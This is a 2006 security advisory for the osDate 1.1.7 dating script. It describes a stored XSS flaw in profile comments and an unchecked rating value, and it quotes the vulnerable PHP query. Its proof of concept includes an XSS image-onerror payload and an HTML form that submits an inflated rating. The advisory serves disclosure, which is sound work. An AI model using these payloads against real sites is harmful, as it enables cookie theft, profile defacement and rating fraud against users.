<<< Date Index >>>     <<< Thread Index >>>

osDate 1.1.7 multiple vulnerabilities



/*\ osDate 1.1.7 advisory /*\

Date of written Advisory:
-------------------------
July, 18 2006


Product:
--------
OSdate <= 1.1.7


Vendor:
-------
http://tufat.com/


Description:
------------
osDate is a full fledged dating script which can be eaily integrated with phpBB 
and flashChat, and provides various payment methods.


Exploit(s) / Vulnerability(ies):
--------------------------------
osDate 1.1.7 is prone to XSS attacks, which allow an attacker a method through 
which to steal cookies and deface user's profiles, as well as boost their own 
ratings by passing unreasonably large votes.

Two variables are not sanitized properly before being used.

here is a comment being written to the database, with no sanitization:

...
$db->query( $sql, array( USER_RATING_TABLE, $_SESSION['UserId'], $_GET['id'], 
'0', time(), $_GET['ratingid'], substr($_POST["txtcomment"],0,250), 
date("Y/m/d") ) );
...

The second problem exists in the rating.   $_POST['txtrating'] is not checked 
to make sure it is a valid value.  the string is simmply accepted and written 
to the database.  Because the rating is decided based on an average of all of 
the ratings, passing a large rating (such as 100) will preserve a perfect 10 
rating.


PoC(s):
-------
A user's page could be defaced by simply posting a comment with the following 
text:
<img src="NOEXIST.NULL" onerror="alert('XSS')">

When the user's profile comments are viewed, the alert/compramised page will 
appear.


As for the rating exploit:
<form method="post" 
action="http://site.com/showprofile.php?id=????&amp;ratingid=?&amp;action=rate";>
<select name="txtrating">
<option value="100">Boost your rating!</option>
</select>
<input name="submit" class="formbutton" value="Submit Rating" type="submit">


Vendor Status:
--------------
Vendor was not informed before publication.


Solution:
---------
The vendor has yet to publish a solution for either exploit.


Credits:
--------
binaryloc

binaryloc[at]gmail[dot]com

http://binary.copyleftwriting.org